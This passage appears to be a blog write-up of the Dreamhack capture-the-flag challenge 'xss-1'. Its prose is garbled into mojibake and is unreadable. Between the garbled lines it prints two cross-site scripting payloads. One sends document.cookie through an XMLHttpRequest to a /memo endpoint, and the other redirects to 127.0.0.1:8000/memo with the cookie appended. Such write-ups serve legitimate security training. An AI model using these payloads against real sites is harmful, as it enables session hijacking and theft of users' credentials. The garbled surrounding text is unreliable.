๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐ŸดCTF/DreamHack

Dreamhack - ์›Œ๊ฒŒ์ž„, XSS-1

by Janger 2021. 11. 22.
728x90
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/28/

 

xss-1

์—ฌ๋Ÿฌ ๊ธฐ๋Šฅ๊ณผ ์ž…๋ ฅ๋ฐ›์€ URL์„ ํ™•์ธํ•˜๋Š” ๋ด‡์ด ๊ตฌํ˜„๋œ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค. XSS ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด ํ”Œ๋ž˜๊ทธ๋ฅผ ํš๋“ํ•˜์„ธ์š”. ํ”Œ๋ž˜๊ทธ๋Š” flag.txt, FLAG ๋ณ€์ˆ˜์— ์žˆ์Šต๋‹ˆ๋‹ค. Reference Client-side Basic

dreamhack.io

 

 

 

 

 

 

/flag๋กœ ์ง„์ž…ํ•ด ์•„๋ž˜์˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ๋„ฃ์–ด์ฃผ์–ด์„œ ์‹คํ–‰ํ•˜์˜€๋‹ค. 

 

<script>var xhr = new XMLHttpRequest();xhr.open('GET', '/memo?memo=' + document.cookie);xhr.send();</script>

XHR ์š”์ฒญ์œผ๋กœ ์„œ๋ฒ„ ์ž๊ธฐ ์ž์‹ ์˜ ์ฟ ํ‚ค๋ฅผ ๋ฉ”๋ชจํ•˜๋Š” ์Šคํฌ๋ฆฝํŠธ์ด๋‹ค. 

 

 

 

/memo๋กœ ๋“ค์–ด๊ฐ€ ์ฃผ๋ฉด? 

 

 

ํ”Œ๋ž˜๊ทธ ๊ฐ’์ด ๋‚˜์˜จ๋‹ค.

 

 

 

<script>location.href="http://127.0.0.1:8000/memo?memo=hello"+document.cookie;</script>

XHR ์š”์ฒญ๋ง๊ณ ๋„, location.href๋ฅผ ์ด์šฉํ•ด๋„ ์ฟ ํ‚ค๊ฐ€ ๋‹ด๊ธด GET ์š”์ฒญ์„ ๋ณด๋‚ผ ์ˆ˜๊ฐ€ ์žˆ๋‹ค.

728x90
๋ฐ˜์‘ํ˜•

'๐ŸดCTF > DreamHack' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Dreamhack - ์›Œ๊ฒŒ์ž„, image-storage  (0) 2021.11.24
Dreamhack - ์›Œ๊ฒŒ์ž„, file-download-1  (0) 2021.11.24
Dreamhack - ์›Œ๊ฒŒ์ž„, pathtraversal  (0) 2021.11.21
Dreamhack - ์›Œ๊ฒŒ์ž„, csrf-1  (0) 2021.11.21
Dreamhack - ์›Œ๊ฒŒ์ž„, php-1  (0) 2021.11.21